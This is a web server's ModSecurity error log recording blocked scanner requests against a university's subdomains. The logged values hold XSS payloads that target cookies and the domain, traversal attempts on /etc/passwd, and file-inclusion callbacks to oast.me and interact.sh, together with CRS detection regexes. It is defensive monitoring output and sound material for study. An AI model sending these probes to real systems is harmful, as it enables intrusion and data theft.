[Tue Aug 29 11:54:01.695489 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156cCo-f0AAAolKcoAAAAe"]
[Tue Aug 29 11:54:01.695737 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAApHRYQAAAAP"]
[Tue Aug 29 11:54:01.746102 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156cCo-f0AAApQ2WMAAAAb"]
[Tue Aug 29 11:54:01.846586 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156cCo-f0AAAo2m9QAAAAA"]
[Tue Aug 29 11:54:02.635325 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAAoZ6WcAAAAK"]
[Tue Aug 29 11:54:02.641252 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156sCo-f0AAAoAk38AAAAC"]
[Tue Aug 29 11:54:02.652121 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAAox7NMAAAAN"]
[Tue Aug 29 11:54:02.694631 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAAox7NUAAAAN"]
[Tue Aug 29 11:54:02.694800 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAApLWmoAAAAI"]
[Tue Aug 29 11:54:02.703891 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAApOdd0AAAAL"]
[Tue Aug 29 11:54:03.800243 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO1568Co-f0AAAowNvUAAAAH"]
[Tue Aug 29 11:54:04.656067 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAAolKdYAAAAe"]
[Tue Aug 29 11:54:04.659538 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAAoZ6W0AAAAK"]
[Tue Aug 29 11:54:04.668319 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAApLWm8AAAAI"]
[Tue Aug 29 11:54:04.699890 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAAolKdcAAAAe"]
[Tue Aug 29 11:54:04.701000 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAAo2m@MAAAAA"]
[Tue Aug 29 11:54:04.869517 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAAolKdkAAAAe"]
[Tue Aug 29 11:54:04.872617 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAAo2m@UAAAAA"]
[Tue Aug 29 11:54:04.873032 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAAoZ6XAAAAAK"]
[Tue Aug 29 11:54:04.874824 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO157MCo-f0AAApQ2XUAAAAb"]
[Tue Aug 29 11:54:04.889657 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAAowNwIAAAAH"]
[Tue Aug 29 11:54:04.891860 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAAo2m@YAAAAA"]
[Tue Aug 29 11:54:05.666258 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157cCo-f0AAApJDXQAAAAY"]
[Tue Aug 29 11:54:05.669281 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157cCo-f0AAAox7OQAAAAN"]
[Tue Aug 29 11:54:07.692503 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO1578Co-f0AAApWYzwAAAAM"]
[Tue Aug 29 11:54:08.175868 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO158MCo-f0AAApQ2YQAAAAb"]
[Tue Aug 29 11:54:08.183470 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO158MCo-f0AAAox7PcAAAAN"]
[Tue Aug 29 11:54:08.222646 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO158MCo-f0AAApbUQUAAAAh"]
[Tue Aug 29 11:54:08.224911 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO158MCo-f0AAApa-AwAAAAg"]
[Tue Aug 29 11:54:08.567111 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApLWokAAAAI"]
[Tue Aug 29 11:54:08.568172 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApbUQgAAAAh"]
[Tue Aug 29 11:54:08.568522 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApa-A8AAAAg"]
[Tue Aug 29 11:54:08.568755 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAAoZ6YQAAAAK"]
[Tue Aug 29 11:54:08.671117 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApXgaUAAAAU"]
[Tue Aug 29 11:54:08.698960 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApXgaYAAAAU"]
[Tue Aug 29 11:54:08.745275 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO158MCo-f0AAApLWowAAAAI"]
[Tue Aug 29 11:54:09.614389 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApa-BUAAAAg"]
[Tue Aug 29 11:54:09.616801 2023] [:error] [pid 2648] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy 